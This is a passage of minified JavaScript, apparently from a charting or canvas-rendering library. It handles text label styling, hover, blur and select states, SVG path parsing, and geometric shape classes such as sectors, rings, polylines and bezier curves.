e?e.stroke:h||s||g.autoStroke&&!v?null:(y=2,m=!0,g.stroke)),b=l.textShadowBlur>0||e.textShadowBlur>0;f.text=t.text,f.x=r,f.y=c,b&&(f.shadowBlur=l.textShadowBlur||e.textShadowBlur||0,f.shadowColor=l.textShadowColor||e.textShadowColor||"transparent",f.shadowOffsetX=l.textShadowOffsetX||e.textShadowOffsetX||0,f.shadowOffsetY=l.textShadowOffsetY||e.textShadowOffsetY||0),f.textAlign=o,f.textBaseline="middle",f.font=t.font||a,f.opacity=st(l.opacity,e.opacity,1),iu(f,l),x&&(f.lineWidth=st(l.lineWidth,e.lineWidth,y),f.lineDash=at(l.lineDash,e.lineDash),f.lineDashOffset=e.lineDashOffset||0,f.stroke=x),_&&(f.fill=_),d.setBoundingRect(Cs(f,t.contentWidth,t.contentHeight,m?0:null))},e.prototype._renderBackground=function(t,e,n,i,r,o){var a,s,l,u=t.backgroundColor,c=t.borderWidth,h=t.borderColor,p=u&&u.image,d=u&&!p,f=t.borderRadius,g=this;if(d||t.lineHeight||c&&h){(a=this._getOrCreateChild(jl)).useStyle(a.createStyle()),a.style.fill=null;var v=a.shape;v.x=n,v.y=i,v.width=r,v.height=o,v.r=f,a.dirtyShape()}if(d)(l=a.style).fill=u||null,l.fillOpacity=at(t.fillOpacity,1);else if(p){(s=this._getOrCreateChild(Hl)).onload=function(){g.dirtyStyle()};var y=s.style;y.image=u.image,y.x=n,y.y=i,y.width=r,y.height=o}c&&h&&((l=a.style).lineWidth=c,l.stroke=h,l.strokeOpacity=at(t.strokeOpacity,1),l.lineDash=t.borderDash,l.lineDashOffset=t.borderDashOffset||0,a.strokeContainThreshold=0,a.hasFill()&&a.hasStroke()&&(l.strokeFirst=!0,l.lineWidth*=2));var m=(a||s).style;m.shadowBlur=t.shadowBlur||0,m.shadowColor=t.shadowColor||"transparent",m.shadowOffsetX=t.shadowOffsetX||0,m.shadowOffsetY=t.shadowOffsetY||0,m.opacity=st(t.opacity,e.opacity,1)},e.makeFont=function(t){var e="";return ru(t)&&(e=[t.fontStyle,t.fontWeight,nu(t.fontSize),t.fontFamily||"sans-serif"].join(" ")),e&&ht(e)||t.textFont||t.font},e}(Rs),Jl={left:!0,right:1,center:1},tu={top:1,bottom:1,middle:1},eu=["fontStyle","fontWeight","fontSize","fontFamily"];function nu(t){return"string"!=typeof t||-1===t.indexOf("px")&&-1===t.indexOf("rem")&&-1===t.indexOf("em")?isNaN(+t)?"12px":t+"px":t}function iu(t,e){for(var n=0;n<eu.length;n++){var i=eu[n],r=e[i];null!=r&&(t[i]=r)}}function ru(t){return null!=t.fontSize||t.fontFamily||t.fontWeight}function ou(t){if(t){t.font=Ql.makeFont(t);var e=t.align;"middle"===e&&(e="center"),t.align=null==e||Jl[e]?e:"left";var n=t.verticalAlign;"center"===n&&(n="middle"),t.verticalAlign=null==n||tu[n]?n:"top",t.padding&&(t.padding=ut(t.padding))}}function au(t,e){return null==t||e<=0||"transparent"===t||"none"===t?null:t.image||t.colorStops?"#000":t}function su(t){return null==t||"none"===t?null:t.image||t.colorStops?"#000":t}function lu(t,e,n){return"right"===e?t-n[1]:"center"===e?t+n[3]/2-n[1]/2:t+n[3]}function uu(t){var e=t.text;return null!=e&&(e+=""),e}function cu(t){return!!(t.backgroundColor||t.lineHeight||t.borderWidth&&t.borderColor)}var hu=Ta(),pu="undefined",du="series",fu=mt(["tooltip","label","itemName","itemId","itemGroupId","itemChildGroupId","seriesName"]),gu="original",vu="arrayRows",yu="objectRows",mu="keyedColumns",_u="typedArray",xu="unknown",bu="column",wu="row",Su=["getDom","getZr","getWidth","getHeight","getDevicePixelRatio","dispatchAction","isSSR","isDisposed","on","off","getDataURL","getConnectedDataURL","getOption","getId","updateLabelLayout"],Mu=function(t){E(Su,function(e){this[e]=U(t[e],t)},this)};var Tu=1,ku={},Cu=Ta(),Iu=Ta(),Du=["emphasis","blur","select"],Au=["normal","emphasis","blur","select"],Pu="highlight",Lu="downplay",Ou="select",Ru="unselect",Nu="toggleSelect",Bu="selectchanged";function zu(t){return null!=t&&"none"!==t}function Eu(t,e,n){t.onHoverStateChange&&(t.hoverState||0)!==n&&t.onHoverStateChange(e),t.hoverState=n}function Vu(t){Eu(t,"emphasis",2)}function Fu(t){2===t.hoverState&&Eu(t,"normal",0)}function Hu(t){Eu(t,"blur",1)}function Gu(t){1===t.hoverState&&Eu(t,"normal",0)}function Wu(t){t.selected=!0}function Uu(t){t.selected=!1}function Zu(t,e,n){e(t,n)}function Yu(t,e,n){Zu(t,e,n),t.isGroup&&t.traverse(function(t){Zu(t,e,n)})}function Xu(t,e){switch(e){case"emphasis":t.hoverState=2;break;case"normal":t.hoverState=0;break;case"blur":t.hoverState=1;break;case"select":t.selected=!0}}function ju(t,e){var n=this.states[t];if(this.style){if("emphasis"===t)return function(t,e,n,i){var r=n&&R(n,"select")>=0,o=!1;if(t instanceof Bl){var a=Cu(t),s=r&&a.selectFill||a.normalFill,l=r&&a.selectStroke||a.normalStroke;if(zu(s)||zu(l)){var u=(i=i||{}).style||{};"inherit"===u.fill?(o=!0,i=A({},i),(u=A({},u)).fill=s):!zu(u.fill)&&zu(s)?(o=!0,i=A({},i),(u=A({},u)).fill=Si(s)):!zu(u.stroke)&&zu(l)&&(o||(i=A({},i),u=A({},u)),u.stroke=Si(l)),i.style=u}}if(i&&null==i.z2){o||(i=A({},i));var c=t.z2EmphasisLift;i.z2=t.z2+(null!=c?c:10)}return i}(this,0,e,n);if("blur"===t)return function(t,e,n){var i=R(t.currentStates,e)>=0,r=t.style.opacity,o=i?null:function(t,e,n,i){for(var r=t.style,o={},a=0;a<e.length;a++){var s=e[a],l=r[s];o[s]=null==l?i&&i[s]:l}for(a=0;a<t.animators.length;a++){var u=t.animators[a];u.__fromStateTransition&&u.__fromStateTransition.indexOf(n)<0&&"style"===u.targetName&&u.saveTo(o,e)}return o}(t,["opacity"],e,{opacity:1}),a=(n=n||{}).style||{};return null==a.opacity&&(n=A({},n),a=A({opacity:i?r:.1*o.opacity},a),n.style=a),n}(this,t,n);if("select"===t)return function(t,e,n){if(n&&null==n.z2){n=A({},n);var i=t.z2SelectLift;n.z2=t.z2+(null!=i?i:9)}return n}(this,0,n)}return n}function qu(t){t.stateProxy=ju;var e=t.getTextContent(),n=t.getTextGuideLine();e&&(e.stateProxy=ju),n&&(n.stateProxy=ju)}function Ku(t,e){!rc(t,e)&&!t.__highByOuter&&Yu(t,Vu)}function $u(t,e){!rc(t,e)&&!t.__highByOuter&&Yu(t,Fu)}function Qu(t,e){t.__highByOuter|=1<<(e||0),Yu(t,Vu)}function Ju(t,e){!(t.__highByOuter&=~(1<<(e||0)))&&Yu(t,Fu)}function tc(t){Yu(t,Hu)}function ec(t){Yu(t,Gu)}function nc(t){Yu(t,Wu)}function ic(t){Yu(t,Uu)}function rc(t,e){return t.__highDownSilentOnTouch&&e.zrByTouch}function oc(t){var e=t.getModel(),n=[],i=[];e.eachComponent(function(e,r){var o=Iu(r),a=function(t,e){return e.mainType===du?t.getViewOfSeriesModel(e):t.getViewOfComponentModel(e)}(t,r),s="series"===e;!s&&i.push(a),o.isBlured&&(a.group.traverse(function(t){Gu(t)}),s&&n.push(r)),o.isBlured=!1}),E(i,function(t){t&&t.toggleBlurSeries&&t.toggleBlurSeries(n,!1,e)})}function ac(t,e,n,i){var r=i.getModel();function o(t,e){for(var n=0;n<e.length;n++){var i=t.getItemGraphicEl(e[n]);i&&ec(i)}}if(n=n||"coordinateSystem",null!=t&&e&&"none"!==e){var a=r.getSeriesByIndex(t),s=a.coordinateSystem;s&&s.master&&(s=s.master);var l=[];r.eachSeries(function(t){var r=a===t,u=t.coordinateSystem;if(u&&u.master&&(u=u.master),!("series"===n&&!r||"coordinateSystem"===n&&!(u&&s?u===s:r)||"series"===e&&r)){if(i.getViewOfSeriesModel(t).group.traverse(function(t){t.__highByOuter&&r&&"self"===e||Hu(t)}),z(e))o(t.getData(),e);else if($(e))for(var c=W(e),h=0;h<c.length;h++)o(t.getData(c[h]),e[c[h]]);l.push(t),Iu(t).isBlured=!0}}),r.eachComponent(function(t,e){if("series"!==t){var n=i.getViewOfComponentModel(e);n&&n.toggleBlurSeries&&n.toggleBlurSeries(l,!0,r)}})}}function sc(t,e,n){if(null!=t&&null!=e){var i=n.getModel().getComponent(t,e);if(i){Iu(i).isBlured=!0;var r=n.getViewOfComponentModel(i);r&&r.focusBlurEnabled&&r.group.traverse(function(t){Hu(t)})}}}function lc(t,e,n,i){var r={focusSelf:!1,dispatchers:null};if(null==t||"series"===t||null==e||null==n)return r;var o=i.getModel().getComponent(t,e);if(!o)return r;var a=i.getViewOfComponentModel(o);if(!a||!a.findHighDownDispatchers)return r;for(var s,l=a.findHighDownDispatchers(n),u=0;u<l.length;u++)if("self"===hu(l[u]).focus){s=!0;break}return{focusSelf:s,dispatchers:l}}function uc(t){E(t.getAllData(),function(e){var n=e.data,i=e.type;n.eachItemGraphicEl(function(e,n){t.isSelected(n,i)?nc(e):ic(e)})})}function cc(t){var e=[];return t.eachSeries(function(t){E(t.getAllData(),function(n){n.data;var i=n.type,r=t.getSelectedDataIndices();if(r.length>0){var o={dataIndex:r,seriesIndex:t.seriesIndex};null!=i&&(o.dataType=i),e.push(o)}})}),e}function hc(t,e,n){vc(t,!0),Yu(t,qu),function(t,e,n){var i=hu(t);null!=e?(i.focus=e,i.blurScope=n):i.focus&&(i.focus=null)}(t,e,n)}function pc(t,e,n,i){i?function(t){vc(t,!1)}(t):hc(t,e,n)}var dc=["emphasis","blur","select"],fc={itemStyle:"getItemStyle",lineStyle:"getLineStyle",areaStyle:"getAreaStyle"};function gc(t,e,n,i){n=n||"itemStyle";for(var r=0;r<dc.length;r++){var o=dc[r],a=e.getModel([o,n]);t.ensureState(o).style=i?i(a):a[fc[n]]()}}function vc(t,e){var n=!1===e,i=t;t.highDownSilentOnTouch&&(i.__highDownSilentOnTouch=t.highDownSilentOnTouch),n&&!i.__highDownDispatcher||(i.__highByOuter=i.__highByOuter||0,i.__highDownDispatcher=!n)}function yc(t){return!(!t||!t.__highDownDispatcher)}function mc(t){var e=t.type;return e===Ou||e===Ru||e===Nu}function _c(t){var e=t.type;return e===Pu||e===Lu}var xc=gl.CMD,bc=[[],[],[]],wc=Math.sqrt,Sc=Math.atan2;var Mc=Math.sqrt,Tc=Math.sin,kc=Math.cos,Cc=Math.PI;function Ic(t){return Math.sqrt(t[0]*t[0]+t[1]*t[1])}function Dc(t,e){return(t[0]*e[0]+t[1]*e[1])/(Ic(t)*Ic(e))}function Ac(t,e){return(t[0]*e[1]<t[1]*e[0]?-1:1)*Math.acos(Dc(t,e))}function Pc(t,e,n,i,r,o,a,s,l,u,c){var h=l*(Cc/180),p=kc(h)*(t-n)/2+Tc(h)*(e-i)/2,d=-1*Tc(h)*(t-n)/2+kc(h)*(e-i)/2,f=p*p/(a*a)+d*d/(s*s);f>1&&(a*=Mc(f),s*=Mc(f));var g=(r===o?-1:1)*Mc((a*a*(s*s)-a*a*(d*d)-s*s*(p*p))/(a*a*(d*d)+s*s*(p*p)))||0,v=g*a*d/s,y=g*-s*p/a,m=(t+n)/2+kc(h)*v-Tc(h)*y,_=(e+i)/2+Tc(h)*v+kc(h)*y,x=Ac([1,0],[(p-v)/a,(d-y)/s]),b=[(p-v)/a,(d-y)/s],w=[(-1*p-v)/a,(-1*d-y)/s],S=Ac(b,w);if(Dc(b,w)<=-1&&(S=Cc),Dc(b,w)>=1&&(S=0),S<0){var M=Math.round(S/Cc*1e6)/1e6;S=2*Cc+M%2*Cc}c.addData(u,m,_,a,s,x,S,h,o)}var Lc=/([mlvhzcqtsa])([^mlvhzcqtsa]*)/gi,Oc=/-?([0-9]*\.)?[0-9]+([eE]-?[0-9]+)?/g;var Rc=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.applyTransform=function(t){},e}(Bl);function Nc(t){return null!=t.setData}function Bc(t,e){var n=function(t){var e=new gl;if(!t)return e;var n,i=0,r=0,o=i,a=r,s=gl.CMD,l=t.match(Lc);if(!l)return e;for(var u=0;u<l.length;u++){for(var c=l[u],h=c.charAt(0),p=void 0,d=c.match(Oc)||[],f=d.length,g=0;g<f;g++)d[g]=parseFloat(d[g]);for(var v=0;v<f;){var y=void 0,m=void 0,_=void 0,x=void 0,b=void 0,w=void 0,S=void 0,M=i,T=r,k=void 0,C=void 0;switch(h){case"l":i+=d[v++],r+=d[v++],p=s.L,e.addData(p,i,r);break;case"L":i=d[v++],r=d[v++],p=s.L,e.addData(p,i,r);break;case"m":i+=d[v++],r+=d[v++],p=s.M,e.addData(p,i,r),o=i,a=r,h="l";break;case"M":i=d[v++],r=d[v++],p=s.M,e.addData(p,i,r),o=i,a=r,h="L";break;case"h":i+=d[v++],p=s.L,e.addData(p,i,r);break;case"H":i=d[v++],p=s.L,e.addData(p,i,r);break;case"v":r+=d[v++],p=s.L,e.addData(p,i,r);break;case"V":r=d[v++],p=s.L,e.addData(p,i,r);break;case"C":p=s.C,e.addData(p,d[v++],d[v++],d[v++],d[v++],d[v++],d[v++]),i=d[v-2],r=d[v-1];break;case"c":p=s.C,e.addData(p,d[v++]+i,d[v++]+r,d[v++]+i,d[v++]+r,d[v++]+i,d[v++]+r),i+=d[v-2],r+=d[v-1];break;case"S":y=i,m=r,k=e.len(),C=e.data,n===s.C&&(y+=i-C[k-4],m+=r-C[k-3]),p=s.C,M=d[v++],T=d[v++],i=d[v++],r=d[v++],e.addData(p,y,m,M,T,i,r);break;case"s":y=i,m=r,k=e.len(),C=e.data,n===s.C&&(y+=i-C[k-4],m+=r-C[k-3]),p=s.C,M=i+d[v++],T=r+d[v++],i+=d[v++],r+=d[v++],e.addData(p,y,m,M,T,i,r);break;case"Q":M=d[v++],T=d[v++],i=d[v++],r=d[v++],p=s.Q,e.addData(p,M,T,i,r);break;case"q":M=d[v++]+i,T=d[v++]+r,i+=d[v++],r+=d[v++],p=s.Q,e.addData(p,M,T,i,r);break;case"T":y=i,m=r,k=e.len(),C=e.data,n===s.Q&&(y+=i-C[k-4],m+=r-C[k-3]),i=d[v++],r=d[v++],p=s.Q,e.addData(p,y,m,i,r);break;case"t":y=i,m=r,k=e.len(),C=e.data,n===s.Q&&(y+=i-C[k-4],m+=r-C[k-3]),i+=d[v++],r+=d[v++],p=s.Q,e.addData(p,y,m,i,r);break;case"A":_=d[v++],x=d[v++],b=d[v++],w=d[v++],S=d[v++],Pc(M=i,T=r,i=d[v++],r=d[v++],w,S,_,x,b,p=s.A,e);break;case"a":_=d[v++],x=d[v++],b=d[v++],w=d[v++],S=d[v++],Pc(M=i,T=r,i+=d[v++],r+=d[v++],w,S,_,x,b,p=s.A,e)}}"z"!==h&&"Z"!==h||(p=s.Z,e.addData(p),i=o,r=a),n=p}return e.toStatic(),e}(t),i=A({},e);return i.buildPath=function(t){var e,i=Nc(t);i&&t.canSave()?(t.appendPath(n),(e=t.getContext())&&t.rebuildPath(e,1)):(e=i?t.getContext():t)&&n.rebuildPath(e,1)},i.applyTransform=function(t){!function(t,e){if(e){var n,i,r,o,a,s,l=t.data,u=t.len(),c=xc.M,h=xc.C,p=xc.L,d=xc.R,f=xc.A,g=xc.Q;for(r=0,o=0;r<u;){switch(n=l[r++],o=r,i=0,n){case c:case p:i=1;break;case h:i=3;break;case g:i=2;break;case f:var v=e[4],y=e[5],m=wc(e[0]*e[0]+e[1]*e[1]),_=wc(e[2]*e[2]+e[3]*e[3]),x=Sc(-e[1]/_,e[0]/m);l[r]*=m,l[r++]+=v,l[r]*=_,l[r++]+=y,l[r++]*=m,l[r++]*=_,l[r++]+=x,l[r++]+=x,o=r+=2;break;case d:s[0]=l[r++],s[1]=l[r++],Ut(s,s,e),l[o++]=s[0],l[o++]=s[1],s[0]+=l[r++],s[1]+=l[r++],Ut(s,s,e),l[o++]=s[0],l[o++]=s[1]}for(a=0;a<i;a++){var b=bc[a];b[0]=l[r++],b[1]=l[r++],Ut(b,b,e),l[o++]=b[0],l[o++]=b[1]}}t.increaseVersion()}}(n,t),this.dirtyShape()},i}var zc=function(){this.cx=0,this.cy=0,this.r=0},Ec=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultShape=function(){return new zc},e.prototype.buildPath=function(t,e){t.moveTo(e.cx+e.r,e.cy),t.arc(e.cx,e.cy,e.r,0,2*Math.PI)},e}(Bl);Ec.prototype.type="circle";var Vc=function(){this.cx=0,this.cy=0,this.rx=0,this.ry=0},Fc=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultShape=function(){return new Vc},e.prototype.buildPath=function(t,e){var n=.5522848,i=e.cx,r=e.cy,o=e.rx,a=e.ry,s=o*n,l=a*n;t.moveTo(i-o,r),t.bezierCurveTo(i-o,r-l,i-s,r-a,i,r-a),t.bezierCurveTo(i+s,r-a,i+o,r-l,i+o,r),t.bezierCurveTo(i+o,r+l,i+s,r+a,i,r+a),t.bezierCurveTo(i-s,r+a,i-o,r+l,i-o,r),t.closePath()},e}(Bl);Fc.prototype.type="ellipse";var Hc=Math.PI,Gc=2*Hc,Wc=Math.sin,Uc=Math.cos,Zc=Math.acos,Yc=Math.atan2,Xc=Math.abs,jc=Math.sqrt,qc=Math.max,Kc=Math.min,$c=1e-4;function Qc(t,e,n,i,r,o,a){var s=t-n,l=e-i,u=(a?o:-o)/jc(s*s+l*l),c=u*l,h=-u*s,p=t+c,d=e+h,f=n+c,g=i+h,v=(p+f)/2,y=(d+g)/2,m=f-p,_=g-d,x=m*m+_*_,b=r-o,w=p*g-f*d,S=(_<0?-1:1)*jc(qc(0,b*b*x-w*w)),M=(w*_-m*S)/x,T=(-w*m-_*S)/x,k=(w*_+m*S)/x,C=(-w*m+_*S)/x,I=M-v,D=T-y,A=k-v,P=C-y;return I*I+D*D>A*A+P*P&&(M=k,T=C),{cx:M,cy:T,x0:-c,y0:-h,x1:M*(r/b-1),y1:T*(r/b-1)}}function Jc(t,e){var n,i=qc(e.r,0),r=qc(e.r0||0,0),o=i>0;if(o||r>0){if(o||(i=r,r=0),r>i){var a=i;i=r,r=a}var s=e.startAngle,l=e.endAngle;if(!isNaN(s)&&!isNaN(l)){var u=e.cx,c=e.cy,h=!!e.clockwise,p=Xc(l-s),d=p>Gc&&p%Gc;if(d>$c&&(p=d),i>$c)if(p>Gc-$c)t.moveTo(u+i*Uc(s),c+i*Wc(s)),t.arc(u,c,i,s,l,!h),r>$c&&(t.moveTo(u+r*Uc(l),c+r*Wc(l)),t.arc(u,c,r,l,s,h));else{var f=void 0,g=void 0,v=void 0,y=void 0,m=void 0,_=void 0,x=void 0,b=void 0,w=void 0,S=void 0,M=void 0,T=void 0,k=void 0,C=void 0,I=void 0,D=void 0,A=i*Uc(s),P=i*Wc(s),L=r*Uc(l),O=r*Wc(l),R=p>$c;if(R){var N=e.cornerRadius;N&&(n=function(t){var e;if(Y(t)){var n=t.length;if(!n)return t;e=1===n?[t[0],t[0],0,0]:2===n?[t[0],t[0],t[1],t[1]]:3===n?t.concat(t[2]):t}else e=[t,t,t,t];return e}(N),f=n[0],g=n[1],v=n[2],y=n[3]);var B=Xc(i-r)/2;if(m=Kc(B,v),_=Kc(B,y),x=Kc(B,f),b=Kc(B,g),M=w=qc(m,_),T=S=qc(x,b),(w>$c||S>$c)&&(k=i*Uc(l),C=i*Wc(l),I=r*Uc(s),D=r*Wc(s),p<Hc)){var z=function(t,e,n,i,r,o,a,s){var l=n-t,u=i-e,c=a-r,h=s-o,p=h*l-c*u;if(!(p*p<$c))return[t+(p=(c*(e-o)-h*(t-r))/p)*l,e+p*u]}(A,P,I,D,k,C,L,O);if(z){var E=A-z[0],V=P-z[1],F=k-z[0],H=C-z[1],G=1/Wc(Zc((E*F+V*H)/(jc(E*E+V*V)*jc(F*F+H*H)))/2),W=jc(z[0]*z[0]+z[1]*z[1]);M=Kc(w,(i-W)/(G+1)),T=Kc(S,(r-W)/(G-1))}}}if(R)if(M>$c){var U=Kc(v,M),Z=Kc(y,M),X=Qc(I,D,A,P,i,U,h),j=Qc(k,C,L,O,i,Z,h);t.moveTo(u+X.cx+X.x0,c+X.cy+X.y0),M<w&&U===Z?t.arc(u+X.cx,c+X.cy,M,Yc(X.y0,X.x0),Yc(j.y0,j.x0),!h):(U>0&&t.arc(u+X.cx,c+X.cy,U,Yc(X.y0,X.x0),Yc(X.y1,X.x1),!h),t.arc(u,c,i,Yc(X.cy+X.y1,X.cx+X.x1),Yc(j.cy+j.y1,j.cx+j.x1),!h),Z>0&&t.arc(u+j.cx,c+j.cy,Z,Yc(j.y1,j.x1),Yc(j.y0,j.x0),!h))}else t.moveTo(u+A,c+P),t.arc(u,c,i,s,l,!h);else t.moveTo(u+A,c+P);if(r>$c&&R)if(T>$c){U=Kc(f,T),X=Qc(L,O,k,C,r,-(Z=Kc(g,T)),h),j=Qc(A,P,I,D,r,-U,h);t.lineTo(u+X.cx+X.x0,c+X.cy+X.y0),T<S&&U===Z?t.arc(u+X.cx,c+X.cy,T,Yc(X.y0,X.x0),Yc(j.y0,j.x0),!h):(Z>0&&t.arc(u+X.cx,c+X.cy,Z,Yc(X.y0,X.x0),Yc(X.y1,X.x1),!h),t.arc(u,c,r,Yc(X.cy+X.y1,X.cx+X.x1),Yc(j.cy+j.y1,j.cx+j.x1),h),U>0&&t.arc(u+j.cx,c+j.cy,U,Yc(j.y1,j.x1),Yc(j.y0,j.x0),!h))}else t.lineTo(u+L,c+O),t.arc(u,c,r,l,s,h);else t.lineTo(u+L,c+O)}else t.moveTo(u,c);t.closePath()}}}var th=function(){this.cx=0,this.cy=0,this.r0=0,this.r=0,this.startAngle=0,this.endAngle=2*Math.PI,this.clockwise=!0,this.cornerRadius=0},eh=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultShape=function(){return new th},e.prototype.buildPath=function(t,e){Jc(t,e)},e.prototype.isZeroArea=function(){return this.shape.startAngle===this.shape.endAngle||this.shape.r===this.shape.r0},e}(Bl);eh.prototype.type="sector";var nh=function(){this.cx=0,this.cy=0,this.r=0,this.r0=0},ih=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultShape=function(){return new nh},e.prototype.buildPath=function(t,e){var n=e.cx,i=e.cy,r=2*Math.PI;t.moveTo(n+e.r,i),t.arc(n,i,e.r,0,r,!1),t.moveTo(n+e.r0,i),t.arc(n,i,e.r0,0,r,!0)},e}(Bl);function rh(t,e,n){var i=e.smooth,r=e.points;if(r&&r.length>=2){if(i){var o=function(t,e,n,i){var r,o,a,s,l=[],u=[],c=[],h=[];if(i){a=[1/0,1/0],s=[-1/0,-1/0];for(var p=0,d=t.length;p<d;p++)Zt(a,a,t[p]),Yt(s,s,t[p]);Zt(a,a,i[0]),Yt(s,s,i[1])}for(p=0,d=t.length;p<d;p++){var f=t[p];if(n)r=t[p?p-1:d-1],o=t[(p+1)%d];else{if(0===p||p===d-1){l.push(Dt(t[p]));continue}r=t[p-1],o=t[p+1]}Lt(u,o,r),zt(u,u,e);var g=Vt(f,r),v=Vt(f,o),y=g+v;0!==y&&(g/=y,v/=y),zt(c,u,-g),zt(h,u,v);var m=Pt([],f,c),_=Pt([],f,h);i&&(Yt(m,m,a),Zt(m,m,s),Yt(_,_,a),Zt(_,_,s)),l.push(m),l.push(_)}return n&&l.push(l.shift()),l}(r,i,n,e.smoothConstraint);t.moveTo(r[0][0],r[0][1]);for(var a=r.length,s=0;s<(n?a:a-1);s++){var l=o[2*s],u=o[2*s+1],c=r[(s+1)%a];t.bezierCurveTo(l[0],l[1],u[0],u[1],c[0],c[1])}}else{t.moveTo(r[0][0],r[0][1]);s=1;for(var h=r.length;s<h;s++)t.lineTo(r[s][0],r[s][1])}n&&t.closePath()}}ih.prototype.type="ring";var oh=function(){this.points=null,this.smooth=0,this.smoothConstraint=null},ah=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultShape=function(){return new oh},e.prototype.buildPath=function(t,e){rh(t,e,!0)},e}(Bl);ah.prototype.type="polygon";var sh=function(){this.points=null,this.percent=1,this.smooth=0,this.smoothConstraint=null},lh=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultStyle=function(){return{stroke:"#000",fill:null}},e.prototype.getDefaultShape=function(){return new sh},e.prototype.buildPath=function(t,e){rh(t,e,!1)},e}(Bl);lh.prototype.type="polyline";var uh={},ch=function(){this.x1=0,this.y1=0,this.x2=0,this.y2=0,this.percent=1},hh=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultStyle=function(){return{stroke:"#000",fill:null}},e.prototype.getDefaultShape=function(){return new ch},e.prototype.buildPath=function(t,e){var n,i,r,o;if(this.subPixelOptimize){var a=Wl(uh,e,this.style);n=a.x1,i=a.y1,r=a.x2,o=a.y2}else n=e.x1,i=e.y1,r=e.x2,o=e.y2;var s=e.percent;0!==s&&(t.moveTo(n,i),s<1&&(r=n*(1-s)+r*s,o=i*(1-s)+o*s),t.lineTo(r,o))},e.prototype.pointAt=function(t){var e=this.shape;return[e.x1*(1-t)+e.x2*t,e.y1*(1-t)+e.y2*t]},e}(Bl);hh.prototype.type="line";var ph=[],dh=function(){this.x1=0,this.y1=0,this.x2=0,this.y2=0,this.cpx1=0,this.cpy1=0,this.percent=1};function fh(t,e,n){var i=t.cpx2,r=t.cpy2;return null!=i||null!=r?[(n?zn:Bn)(t.x1,t.cpx1,t.cpx2,t.x2,e),(n?zn:Bn)(t.y1,t.cpy1,t.cpy2,t.y2,e)]:[(n?Wn:Gn)(t.x1,t.cpx1,t.x2,e),(n?Wn:Gn)(t.y1,t.cpy1,t.y2,e)]}var gh=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultStyle=function(){return{stroke:"#000",fill:null}},e.prototype.getDefaultShape=function(){return new dh},e.prototype.buildPath=function(t,e){var n=e.x1,i=e.y1,r=e.x2,o=e.y2,a=e.cpx1,s=e.cpy1,l=e.cpx2,u=e.cpy2,c=e.percent;0!==c&&(t.moveTo(n,i),null==l||null==u?(c<1&&(Zn(n,a,r,c,ph),a=ph[1],r=ph[2],Zn(i,s,o,c,ph),s=ph[1],o=ph[2]),t.quadraticCurveTo(a,s,r,o)):(c<1&&(Fn(n,a,l,r,c,ph),a=ph[1],l=ph[2],r=ph[3],Fn(i,s,u,o,c,ph),s=ph[1],u=ph[2],o=ph[3]),t.bezierCurveTo(a,s,l,u,r,o)))},e.prototype.pointAt=function(t){return fh(this.shape,t,!1)},e.prototype.tangentAt=function(t){var e=fh(this.shape,t,!0);return Et(e,e)},e}(Bl);gh.prototype.type="bezier-curve";var vh=function(){this.cx=0,this.cy=0,this.r=0,this.startAngle=0,this.endAngle=2*Math.PI,this.clockwise=!0},yh=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultStyle=function(){return{stroke:"#000",fill:null}},e.prototype.getDefaultShape=function(){return new vh},e.prototype.buildPath=function(t,e){var n=e.cx,i=e.cy,r=Math.max(e.r,0),o=e.startAngle,a=e.endAngle,s=e.clockwise,l=Math.cos(o),u=Math.sin(o);t.moveTo(l*r+n,u*r+i),t.arc(n,i,r,o,a,!s)},e}(Bl);yh.prototype.type="arc";var mh=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.type="compound",e}return n(e,t),e.prototype._updatePathDirty=function(){for(var t=this.shape.paths,e=this.shapeChanged(),n=0;n<t.length;n++)e=e||t[n].shapeChanged();e&&this.dirtyShape()},e.prototype.beforeBrush=function(){this._updatePathDirty();for(var t=this.shape.paths||[],e=this.getGlobalScale(),n=0;n<t.length;n++)t[n].path||t[n].createPathProxy(),t[n].path.setScale(e[0],e[1],t[n].segmentIgnoreThreshold)},e.prototype.buildPath=function(t,e){for(var n=e.paths||[],i=0;i<n.length;i++)n[i].buildPath(t,n[i].shape,!0)},e.prototype.afterBrush=function(){for(var t=this.shape.paths||[],e=0;e<t.length;e++)t[e].pathUpdated()},e.prototype.getBoundingRect=function(){return this._updatePathDirty.call(this),Bl.prototype.getBoundingRect.call(this)},e}(Bl),_h=function(){function t(t){this.colorStops=t||[]}return t.prototype.addColorStop=function(t,e){this.colorStops.push({offset:t,color:e})},t}(),xh=function(t){function e(e,n,i,r,o,a){var s=t.call(this,o)||this;return s.x=null==e?0:e,s.y=null==n?0:n,s.x2=null==i?1:i,s.y2=null==r?0:r,s.type="linear",s.global=a||!1,s}return n(e,t),e}(_h),bh=function(t){function e(e,n,i,r,o){var a=t.call(this,r)||this;return a.x=null==e?.5:e,a.y=null==n?.5:n,a.r=null==i?.5:i,a.type="radial",a.global=o||!1,a}return n(e,t),e}(_h),wh=Math.min,Sh=Math.max,Mh=Math.abs,Th=[0,0],kh=[0,0],Ch=en(),Ih=Ch.minTv,Dh=Ch.maxTv,Ah=function(){function t(t,e){this._corners=[],this._axes=[],this._origin=[0,0];for(var n=0;n<4;n++)this._corners[n]=new Ae;for(n=0;n<2;n++)this._axes[n]=new Ae;t&&this.fromBoundingRect(t,e)}return t.prototype.fromBoundingRect=function(t,e){var n=this._corners,i=this._axes,r=t.x,o=t.y,a=r+t.width,s=o+t.height;if(n[0].set(r,o),n[1].set(a,o),n[2].set(a,s),n[3].set(r,s),e)for(var l=0;l<4;l++)n[l].transform(e);Ae.sub(i[0],n[1],n[0]),Ae.sub(i[1],n[3],n[0]),i[0].normalize(),i[1].normalize();for(l=0;l<2;l++)this._origin[l]=i[l].dot(n[0])},t.prototype.intersect=function(t,e,n){var i=!0,r=!e;return 